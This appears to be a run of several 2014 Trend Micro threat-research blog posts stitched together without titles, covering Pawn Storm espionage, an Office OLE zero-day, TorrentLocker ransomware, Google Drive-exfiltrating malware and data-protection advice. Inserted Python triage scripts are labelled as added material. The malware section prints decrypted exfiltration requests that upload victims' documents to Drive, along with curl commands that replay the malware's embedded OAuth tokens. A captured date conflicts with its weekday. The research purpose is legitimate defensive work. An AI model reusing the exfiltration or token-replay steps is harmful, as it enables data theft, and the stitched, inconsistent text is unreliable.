    October 2014
    Pawn Storm is an active economic and political cyber-espionage operation targeting a wide range of entities, mostly those related to the military, governments, and media. Specific targets include:

    • Military agencies, embassies, and defense contractors in the US and its allies
    • Opposition politicians and dissidents of the Russian government
    • International media
    • The national security department of a US ally

    The cyber criminals behind Operation Pawn Storm are using several different attack scenarios: spear-phishing emails with malicious Microsoft Office documents lead to SEDNIT/Sofacy malware, very selective exploits injected into legitimate websites that will also lead to SEDNIT/Sofacy malware, and phishing emails that redirect victims to fake Outlook Web Access login pages.

    A Closer Look at SEDNIT

    Our investigation into Pawn Storm has shown that the attackers have done their homework. Their choices of targets and the use of SEDNIT malware indicate the attackers are very experienced; SEDNIT has been designed to penetrate their targets’ defenses and remain persistent in order to capture as much information as they can.


    Figure 1. Phases 1 and 2 in an Operation Pawn Storm attack

    The spear phishing emails sent in Pawn Storm attacks can be aimed at very specific targets. In one example, a spear phishing email was sent to only 3 employees of the legal department of a billion-dollar multinational firm. The e-mail addresses of the recipients are not advertised anywhere online. The company in question was involved in an important legal dispute, which shows a clear economic espionage motive on the part of the attackers. Luckily nobody clicked on the link in the spear phishing e-mail, and Trend Micro was able to warn the company at an early stage, preventing any further damage.

    This attack, however, is just one of many launched, and there will surely be more. The attackers behind Operation Pawn Storm have been active since at least 2007 and they continue to launch new campaigns. In June 2014 they compromised government websites in Poland, and in September 2014 the website of the Power Exchange in Poland, by inserting a malicious iframe pointing to an exploit server at yovtube[dot]co and defenceiq[dot]us. The exploit server was, however, very selective in infecting victims, so that SEDNIT malware was only installed on selected systems.

    Another technique used by the Pawn Storm attackers is a very clever phishing attack that specifically targets Outlook Web Access users. We will discuss that part in another entry that we will release soon. In the meantime, check the full details of our research in our paper: Operation Pawn Storm.


    Microsoft has disclosed that a new zero-day vulnerability is present in Windows, and is exploited via Microsoft Office files. According to Microsoft Security Advisory 3010060, the vulnerability is present in all supported versions of Windows except Windows Server 2003.

    The vulnerability (designated as CVE-2014-6352) is triggered by an attacker sending a specially crafted Microsoft Office file to the user. Currently, attacks using PowerPoint files are known to exist, but all Office file types can be used to carry out this attack.

    The specially crafted files contain a malicious Object Linking and Embedding (OLE) object. OLE is the technology used to share data between applications, and the vulnerability lies in this Windows component. Exploiting it allows malicious code to run with the privileges of the current user; to gain administrator access, a separate exploit must be used. In addition, under default settings a User Account Control (UAC) prompt is displayed, which may alert the user that something unusual is going on.

    Currently, Microsoft has not indicated whether a patch to solve this issue will be sent outside of the regular Patch Tuesday cycle. Until more definitive information becomes available, we advise users to be careful about opening Office documents that they have been sent, particularly if they come from parties that have not sent you documents beforehand. The Microsoft bulletin also includes several workarounds and temporary fixes, including settings for users of the Enhanced Mitigation Experience Toolkit (EMET) utility.
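As a defender-side example added here (not code from the original post or from Microsoft), the following Python script triages an OOXML Office document for embedded OLE objects of the kind this advisory describes; the sample documents it builds in memory are constructed and are not exploit files.

```python
import io
import zipfile

# Magic bytes of an OLE2 compound document, the container format used for
# embedded OLE objects (and for legacy .doc/.ppt/.xls files).
OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"


def find_embedded_ole(data):
    """Return [(member_name, is_ole2)] for every embedded-object part in an
    OOXML container (.docx/.pptx/.xlsx). Empty list when the document has
    no embeddings; ValueError when the input is not a zip container."""
    if not zipfile.is_zipfile(io.BytesIO(data)):
        raise ValueError("not an OOXML (zip) container")
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            # OOXML stores embedded OLE objects under <part>/embeddings/
            if "/embeddings/" not in name.lower():
                continue
            with zf.open(name) as member:
                head = member.read(len(OLE2_MAGIC))
            hits.append((name, head == OLE2_MAGIC))
    return hits


def triage(data):
    """'review' if the document carries any embedded object, else 'clean'.
    An embedding is not proof of exploitation, only a reason to look."""
    return "review" if find_embedded_ole(data) else "clean"


def build_sample(with_ole):
    """Constructed sample (not a real exploit document): a minimal zip laid
    out like a .pptx, optionally carrying one OLE2 embedding."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("ppt/slides/slide1.xml", "<p:sld/>")
        if with_ole:
            zf.writestr("ppt/embeddings/oleObject1.bin", OLE2_MAGIC + b"\0" * 64)
    return buf.getvalue()


if __name__ == "__main__":
    for flag in (False, True):
        doc = build_sample(flag)
        print(triage(doc), find_embedded_ole(doc))
```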

    Update as of October 24, 2014, 7:30 P.M. PDT

    Currently available information suggests that this vulnerability is essentially identical to the Sandworm vulnerability, which was reported and patched more than a week ago. The patch first put in place by Microsoft did not completely resolve the problem, allowing new exploits to target the same underlying flaw.

    Deep Security solutions that protect against Sandworm also protect against these more recent attacks. The following DPI rules cover these threats:

    • 1006290 - Microsoft Windows OLE Remote Code Execution Vulnerability (CVE-2014-4114)
    • 1006291 - Microsoft Windows OLE Remote Code Execution Vulnerability (CVE-2014-4114) – 1

    We recently observed a new ransomware variant, TorrentLocker, that was targeted at nearly 4,000 organizations and enterprises, many of which are located in Italy. TorrentLocker is similar to an earlier ransomware family (CryptoLocker), and also encrypts various files and forces users to pay a sum of money. TorrentLocker uses the TOR anonymity network to hide its network traffic, which may have been the origin of its name.

    The threat used spam email written in Italian, with several templates, as part of its social engineering tactics. Translated into English, these messages read:

    1. Your question has been asked on the forum {day}/{month}/{year} {time}. Detailed answer refer to the following address: {malicious link}
    2. He sent a bill that would have paid before {day}/{month}/{year}. Details found: {malicious link}
    3. Your request has been initiated to revise the payment {malicious link}

    Figure 1. Sample spam email

    All the messages contain a link that points to a .ZIP file. Decompressing the archive yields a file disguised as a .PDF document. PDF files are commonly passed around within organizations, so employees who receive this spammed message may be tricked into thinking that it is legitimate.

    Figure 2. Screenshot of the linked archive file

    Some of the archive files have filenames that translate to payment, transaction, compensation, and balance. However, instead of a PDF file, these files are actually a CryptoLocker variant detected by Trend Micro as TROJ_CRILOCK.YNG.

    Similar to other CryptoLocker variants, it encrypts a wide variety of file types including .DOTX, .DOCX, .DOC, .TXT, .PPT, .PPTX, and .XLSX, among others. All of these file types are associated with Microsoft Office products and are commonly used in enterprises in daily operations.
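An added example, not part of the original post: the Python script below inspects a ZIP attachment the way a mail gateway might, comparing each member's claimed extension with its real content so that an executable disguised as a PDF is flagged. The archive and the file names it builds are constructed.

```python
import io
import os
import zipfile

# Content signatures (constructed table): a PDF starts with "%PDF", a
# Windows executable with the "MZ" DOS header.
SIGNATURES = ((b"%PDF", "pdf"), (b"MZ", "exe"))


def inspect_archive(data):
    """Return [(member_name, claimed_type, actual_type)] for a ZIP attachment.
    claimed_type comes from the file extension, actual_type from the first
    bytes of the content, so the two can be compared."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as member:
                head = member.read(4)
            claimed = os.path.splitext(info.filename)[1].lower().lstrip(".") or "none"
            actual = next((kind for magic, kind in SIGNATURES
                           if head.startswith(magic)), "unknown")
            findings.append((info.filename, claimed, actual))
    return findings


def is_suspicious(findings):
    """True when any member is really an executable but does not present
    itself as one: a '.pdf' whose bytes say MZ, or a double extension such
    as 'payment.pdf.exe' that hides the .exe behind a document name."""
    for name, claimed, actual in findings:
        if actual == "exe" and (claimed != "exe" or ".pdf." in name.lower()):
            return True
    return False


def build_sample(disguised):
    """Constructed sample archive, not a real TorrentLocker sample."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("statement.pdf", b"%PDF-1.4\n%constructed benign document\n")
        if disguised:
            # a PE stub named to look like a PDF, as in the spam run described
            zf.writestr("payment.pdf.exe", b"MZ" + b"\0" * 62)
    return buf.getvalue()


if __name__ == "__main__":
    for flag in (False, True):
        report = inspect_archive(build_sample(flag))
        print("suspicious" if is_suspicious(report) else "ok", report)
```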

    In order to receive the decryptor tool that supposedly retrieves their files, users need to pay the ransom in Bitcoin, a type of digital currency. One of the samples we found asked for a ransom of 1.375 BTC, which is worth around $500.



    Figures 3 and 4. Screenshots of ransomware (Click to enlarge)

    Italian users are the most affected by this particular spam run, as just over half of all spam messages identified with this spam run were sent to users in Italy. A quarter came from Brazil, with other countries accounting for the remainder. At its peak, several thousand users were affected per day.

    Figure 5. Distribution of TorrentLocker targets globally

    Figure 6. Number of affected targets per day

    We protect our users against this threat by blocking the different facets of this threat. In addition to blocking the various spam messages, we also block the malicious URLs and detect the malicious files used in this attack.

    The hashes of the file seen in this attack include:


    Additional information provided by Grant Chen


    Using cloud-based sharing sites is not a new routine for bad guys. Aside from providing free storage for their malicious files, these legitimate sites are used to evade security vendors and researchers.

    We have seen malware that has taken advantage of such sites, including DropBox, Sendspace, and Evernote. We can now add Google Drive to the list of “abused” sites. We recently came across malware, detected as TSPY_DRIGO.A, that uses Google Drive as one way of siphoning information from its victims.

    Access to Google Drive

    Once executed, the malware checks certain locations for files of the following types and uploads them to Google Drive:

    • XLSX
    • XLS
    • DOC
    • DOCX
    • PDF
    • TXT
    • PPT
    • PPTX

    The locations where the malware checks for files include the Recycle Bin and the User Documents folder.

    In order to upload the files to Google Drive, a client_id and client_secret are embedded in the malware, together with a refresh token. Refresh tokens are part of the OAuth 2.0 protocol, which Google Drive uses; the same protocol is what lets sites such as Twitter and Facebook allow their users to log in to a different website with their accounts. Access tokens grant access to a Google Drive account, but they expire, so refresh tokens are needed to obtain new access tokens.

    We decrypted communication from the malware and saw activity such as requests for new tokens and uploading files.

    ; request for new token

    POST /o/oauth2/token HTTP/1.1
    User-Agent: Go 1.1 package http
    Content-Length: 208
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip

    client_id={REMOVED} {REMOVED}&grant_type=refresh_token&refresh_token={REMOVED}

    ;reply for new token

    HTTP/1.1 200 OK
    Content-Type: application/json; charset=utf-8
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Fri, 01 Jan 1990 00:00:00 GMT
    Date: Thu, 14 Oct 2014 08:08:32 GMT
    Content-Disposition: attachment; filename="sample.txt"; filename*=UTF-8''sample.txt
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    X-XSS-Protection: 1; mode=block
    Server: GSE
    Alternate-Protocol: 443:quic
    Transfer-Encoding: chunked

    {
    "access_token" : "{REMOVED}",
    "token_type" : "Bearer",
    "expires_in" : 3600
    }

    ;upload file

    POST /upload/drive/v2/files?alt=json&uploadType=multipart HTTP/1.1
    User-Agent: google-api-go-client/0.5
    Content-Length: 398
    Authorization: OAuth {REMOVED}

    Content-Type: multipart/related; boundary=e0cee80c4f3d21e18e77548a60b374408ce65bc3b76c5de1cdbe2afe7eeb
    Accept-Encoding: gzip

    We used this same approach in order to check the files uploaded in the Google Drive account. As of this writing, some of the files are still “active” or present in the account. We’ve also found that the file names reveal the targeted entities, which are mostly government agencies.

    Below is the command line used for testing:

    ;Request new token (the capture above shows only the path /o/oauth2/token; the standard accounts.google.com host is assumed)
    curl -d "client_id={CLIENT_ID}&client_secret={SECRET_KEY}&grant_type=refresh_token&refresh_token={REFRESH_TOKEN}" https://accounts.google.com/o/oauth2/token

    ;List files (Drive v2 files endpoint assumed; the capture above shows only the upload path)
    curl -H "Authorization: OAuth {ACCESS_TOKEN}" https://www.googleapis.com/drive/v2/files

    Here’s an excerpt of the log from the Google Drive account on one of the files uploaded:

    "kind": "drive#file",
    "title": "{HOSTNAME} C:\\Users\\{USERNAME}\\AppData\\Roaming\\{REMOVED}長致詞{REMOVED}.doc",
    "mimeType": "application/",
    "createdDate": "2014-10-16T10:13:14.339Z",
    "modifiedDate": "2014-10-16T10:13:16.286Z",
    "modifiedByMeDate": "2014-10-16T10:13:16.286Z",
    "lastViewedByMeDate": "2014-10-16T10:13:16.286Z",
    "markedViewedByMeDate": "1970-01-01T00:00:00.000Z",
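As an added incident-response example (not the researchers' own tooling), the Python code below reproduces the two curl checks above with urllib and then parses a Drive listing to group uploads by victim host and user, using the "{HOSTNAME} {path}" title format seen in the log excerpt. The endpoint hosts and the sample replies are assumptions and constructed data, not values taken from the post.

```python
import json
import re
from urllib.parse import urlencode
from urllib.request import Request

# Endpoint hosts are assumed (the standard Google ones); the captures above
# show only the paths /o/oauth2/token and /upload/drive/v2/files.
TOKEN_URL = "https://accounts.google.com/o/oauth2/token"
LIST_URL = "https://www.googleapis.com/drive/v2/files"

# Upload titles have the form "<HOSTNAME> <original Windows path>", as in
# the log excerpt; this pattern is inferred from that one line.
TITLE_RE = re.compile(r"^(?P<host>\S+) (?P<path>[A-Za-z]:\\Users\\(?P<user>[^\\]+)\\.*)$")


def refresh_request(client_id, client_secret, refresh_token):
    """Build the refresh_token grant the malware sends to obtain a fresh access token."""
    body = urlencode({"client_id": client_id, "client_secret": client_secret,
                      "grant_type": "refresh_token", "refresh_token": refresh_token})
    return Request(TOKEN_URL, data=body.encode(), method="POST",
                   headers={"Content-Type": "application/x-www-form-urlencoded"})


def parse_token_reply(text):
    """Extract the short-lived access token and its lifetime in seconds from the JSON reply."""
    reply = json.loads(text)
    return reply["access_token"], int(reply["expires_in"])


def list_request(access_token):
    """Build the listing request with the same 'OAuth' scheme seen in the upload capture."""
    return Request(LIST_URL, headers={"Authorization": "OAuth " + access_token})


def victims_from_listing(text):
    """Group a drive#fileList reply by (hostname, username): the exfiltration
    account itself tells the responder which machines and users were hit."""
    victims = {}
    for item in json.loads(text).get("items", []):
        match = TITLE_RE.match(item.get("title", "")) if item.get("kind") == "drive#file" else None
        if match:
            victims.setdefault((match["host"], match["user"]), []).append(match["path"])
    return victims


# Constructed sample replies (no real account data).
SAMPLE_TOKEN_REPLY = '{"access_token": "ya29.constructed", "token_type": "Bearer", "expires_in": 3600}'
SAMPLE_LISTING = json.dumps({"kind": "drive#fileList", "items": [
    {"kind": "drive#file", "title": "WS-FIN01 C:\\Users\\alice\\Documents\\budget.xlsx"},
    {"kind": "drive#file", "title": "WS-FIN01 C:\\Users\\alice\\AppData\\Roaming\\memo.doc"},
    {"kind": "drive#file", "title": "DESK-07 C:\\Users\\bob\\Desktop\\plan.pptx"},
    {"kind": "drive#file", "title": "no-host-prefix.txt"}]})

if __name__ == "__main__":
    token, ttl = parse_token_reply(SAMPLE_TOKEN_REPLY)
    print("token valid for", ttl, "s;", list_request(token).get_header("Authorization"))
    for (host, user), paths in victims_from_listing(SAMPLE_LISTING).items():
        print(host, user, len(paths), "files")
```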

    The Other Google Connection

    Use of Google Drive isn’t the only thing that connects this malware to Google. The malware was actually created using the Go programming language, commonly known as golang. This is an open source programming language that was initially developed by Google. According to Google, “the goals of the Go project were to eliminate the slowness and clumsiness of software development at Google, and thereby to make the process more productive and scalable.”

    While interesting, the use of golang is not new; security researchers have seen golang-created malware as early as 2012. It would be hard to pinpoint the exact reason for using golang but some have attributed its appeal to its supposed lack of mainstream profile.

    Gathering Information

    Our analysis shows that this malware can only upload document-type files to Google Drive. This type of malware routine is perfect for reconnaissance—one of the earlier stages of a targeted attack. After all, one of the key aspects of a successful attack is having enough information on the target. The more information the attackers can gather, the more attack vectors they can use against their target.

    The following hashes are related to this attack:

    • 2C32674B334F10000CB63ED4BA4EE543A16D8572
    • 2D98DDF8F5128853DD33523BCBBD472B8D362705

    Trend Micro secures enterprises via its Custom Defense solution that provides advanced threat protection by performing network-wide monitoring to detect zero-day malware, malicious communications, and attacker behaviors invisible to standard solutions.

    We have already notified Google about this incident.

    With additional insight from Ronnie Giagone, Dove Chiu, and Vico Fang.



    Recent data breaches in big enterprises like large banks and retail chains make one thing clear: data privacy and protection is a concern for all organizations, not just large ones. If large enterprises with plenty of available resources can be affected by attacks and lose their data, smaller organizations without these resources are at risk as well.

    Users are not just worried about whether their data is secure; today they are also worrying about whether their data will be used properly by the sites and businesses they deal with. Concern among users about privacy has increased in recent months and years.

    The statistics bear this all out. A survey carried out in March 2014 by the market research firm GfK highlighted significant, and growing, concerns from consumers about their personal data. 49% of respondents said they were “very much” concerned about how their data was protected, with 60% of respondents saying this concern had increased in the past 12 months.

    Consumers are also taking action. A 2014 study by Radius Global found that 69% of survey respondents would do less business with a company they knew had been breached; 67% would try to only do business with companies that they feel can handle their data. The consequences for companies are clear.

    So, what should companies do? First of all, they need to recognize that data protection is now an important part of doing business. This means that they must actually approach it as something that matters, and not just as a pain that has to be tolerated.

    To do this, organizations should first take stock and remember just what they are protecting and consider what’s most important – i.e., what is their core data. These should be protected with the best available resources. Keep in mind that the levels of protection necessary can change, depending on regulations (like the soon-to-be-implemented data protection regulations in the European Union).

    Local regulations on data protection can vary significantly. In the United States, there is no comprehensive law that covers all sectors. Instead, per-industry legislation such as the Health Insurance Portability and Accountability Act (HIPAA) is in place.

    In other countries, more comprehensive regulations that cover all sectors are more common. For example, countries in the European Union will soon be covered by the EU General Data Protection Regulation, which mandates EU-wide rules on data protection. Japan has similar laws in the form of the Act on the Protection of Personal Information, which dates back to 2003.

    However, not all organizations actually understand these regulations: in the EU, only 13% of businesses called their understanding of the upcoming regulations “very good”. This is despite the fact that, for example, EU businesses can be fined up to 5% of their annual turnover if they violate the proposed regulations.

    Similar approaches need to be taken to assuage concerns about privacy. Ensure that what data is being collected is used correctly and in such a way as not to be perceived as “creepy” by end users. The same data protection that is done for core data must be applied here, too: end users will not take kindly to businesses that don’t protect the data of their customers.

    In the end, data protection comes down not just to technical aspects, but for organizations to decide that it matters. With the new year fast approaching, companies can learn from the many incidents of 2014 and ensure that their own organizations do not fall victim to similar attacks. To know more about data protection law, read our infographic, The Road to Compliance: A Visual Guide to the EU Data Protection Law.

    Trend Micro secures users’ data via its integrated data loss prevention technology, which protects data found in endpoints, servers, networks, and even the cloud. It also protects the transfer of data between locations and comes with central policy management, which does not require the installation of different technologies across multiple security layers.


